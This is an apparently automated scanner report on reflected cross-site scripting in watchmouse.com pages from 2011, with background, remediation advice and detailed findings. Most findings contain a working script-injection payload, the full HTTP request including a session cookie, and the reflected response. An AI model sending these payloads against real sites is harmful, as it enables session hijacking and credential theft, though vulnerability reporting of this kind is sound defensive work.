1.358. http://www.watchmouse.com/pt/learn_more.php [REST URL parameter 2]

1.359. http://www.watchmouse.com/pt/learn_more.php [name of an arbitrarily supplied request parameter]

1.360. http://www.watchmouse.com/pt/plans_price.php [REST URL parameter 1]

1.361. http://www.watchmouse.com/pt/plans_price.php [REST URL parameter 2]

1.362. http://www.watchmouse.com/pt/plans_price.php [name of an arbitrarily supplied request parameter]

1.363. http://www.watchmouse.com/pt/register.php [REST URL parameter 1]

1.364. http://www.watchmouse.com/pt/register.php [REST URL parameter 2]

1.365. http://www.watchmouse.com/pt/register.php [name of an arbitrarily supplied request parameter]

1.366. http://www.watchmouse.com/pubstatus.php [REST URL parameter 1]

1.367. http://www.watchmouse.com/pubstatus.php [name of an arbitrarily supplied request parameter]

1.368. http://www.watchmouse.com/settings.php [REST URL parameter 1]

1.369. http://www.watchmouse.com/settings.php [name of an arbitrarily supplied request parameter]

1.370. http://www.watchmouse.com/sv/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.371. http://www.watchmouse.com/sv/ [REST URL parameter 1]

1.372. http://www.watchmouse.com/sv/ [name of an arbitrarily supplied request parameter]

1.373. http://www.watchmouse.com/sv/feature/public-status-page.html [REST URL parameter 1]

1.374. http://www.watchmouse.com/sv/feature/public-status-page.html [REST URL parameter 2]

1.375. http://www.watchmouse.com/sv/feature/public-status-page.html [REST URL parameter 3]

1.376. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.377. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.378. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.379. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.380. http://www.watchmouse.com/sv/learn_more.php [REST URL parameter 1]

1.381. http://www.watchmouse.com/sv/learn_more.php [REST URL parameter 2]

1.382. http://www.watchmouse.com/sv/learn_more.php [name of an arbitrarily supplied request parameter]

1.383. http://www.watchmouse.com/sv/plans_price.php [REST URL parameter 1]

1.384. http://www.watchmouse.com/sv/plans_price.php [REST URL parameter 2]

1.385. http://www.watchmouse.com/sv/plans_price.php [name of an arbitrarily supplied request parameter]

1.386. http://www.watchmouse.com/sv/register.php [REST URL parameter 1]

1.387. http://www.watchmouse.com/sv/register.php [REST URL parameter 2]

1.388. http://www.watchmouse.com/sv/register.php [name of an arbitrarily supplied request parameter]

1.389. http://www.watchmouse.com/trial.php [REST URL parameter 1]

1.390. http://www.watchmouse.com/trial.php [name of an arbitrarily supplied request parameter]

1.391. http://www.watchmouse.com/worldwide.php [REST URL parameter 1]

1.392. http://www.watchmouse.com/worldwide.php [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 392 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.watchmouse.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dda5"><script>alert(1)</script>6abf1d1d559 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?9dda5"><script>alert(1)</script>6abf1d1d559=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:39 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-e30de4188d70908675753b87c9b948c2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 17963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/?9dda5"><script>alert(1)</script>6abf1d1d559=1" method="post">
...[SNIP]...

1.2. http://www.watchmouse.com/assets/css/chat.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/chat.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4284"><script>alert(1)</script>9c72a01d555 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetsd4284"><script>alert(1)</script>9c72a01d555/css/chat.css HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/chat.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-4e9aa03e6ffc382c1ac3db0784cd338d"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetsd4284"><script>alert(1)</script>9c72a01d555/css/chat.css" method="post">
...[SNIP]...

1.3. http://www.watchmouse.com/assets/css/chat.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/chat.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acfba"><script>alert(1)</script>011585907e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/cssacfba"><script>alert(1)</script>011585907e4/chat.css HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/chat.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-23228c3cf68c27478046198de94dbd71"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/cssacfba"><script>alert(1)</script>011585907e4/chat.css" method="post">
...[SNIP]...

1.4. http://www.watchmouse.com/assets/css/chat.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/chat.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4494"><script>alert(1)</script>3072aa18942 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/chat.cssc4494"><script>alert(1)</script>3072aa18942 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/chat.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-d8b3c5fcfb4be8a12a3c1310592e17ef"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/chat.cssc4494"><script>alert(1)</script>3072aa18942" method="post">
...[SNIP]...

1.5. http://www.watchmouse.com/assets/css/fancybox.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/fancybox.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 171ad"><script>alert(1)</script>49251d16df7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets171ad"><script>alert(1)</script>49251d16df7/css/fancybox.css HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-70b22df926a6b5795c7aefc23fcb19bd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets171ad"><script>alert(1)</script>49251d16df7/css/fancybox.css" method="post">
...[SNIP]...

1.6. http://www.watchmouse.com/assets/css/fancybox.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/fancybox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0665"><script>alert(1)</script>331d75dd070 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/cssb0665"><script>alert(1)</script>331d75dd070/fancybox.css HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-4cb1330944af7a01439ef6f36b612d19"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/cssb0665"><script>alert(1)</script>331d75dd070/fancybox.css" method="post">
...[SNIP]...

1.7. http://www.watchmouse.com/assets/css/fancybox.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/fancybox.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ca9c"><script>alert(1)</script>5b062acde4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/fancybox.css2ca9c"><script>alert(1)</script>5b062acde4 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-39de29d75eca7df5c03ad50c589e343e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/fancybox.css2ca9c"><script>alert(1)</script>5b062acde4" method="post">
...[SNIP]...

1.8. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a034c"><script>alert(1)</script>9f891514c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetsa034c"><script>alert(1)</script>9f891514c4/css/print.css?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:49 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f4b14ef24fd185b6a7028954c01c369b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetsa034c"><script>alert(1)</script>9f891514c4/css/print.css?20101008" method="post">
...[SNIP]...

1.9. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8303e"><script>alert(1)</script>53626a66573 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css8303e"><script>alert(1)</script>53626a66573/print.css?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-73a1c84daad1dd136c7864cbe222e92c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css8303e"><script>alert(1)</script>53626a66573/print.css?20101008" method="post">
...[SNIP]...

1.10. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74725"><script>alert(1)</script>a742c99b4ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/print.css74725"><script>alert(1)</script>a742c99b4ff?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-57a0127f294315b215c2b50e29f870d4"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/print.css74725"><script>alert(1)</script>a742c99b4ff?20101008" method="post">
...[SNIP]...

1.11. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/screen.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c1dc"><script>alert(1)</script>f828aa78b0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

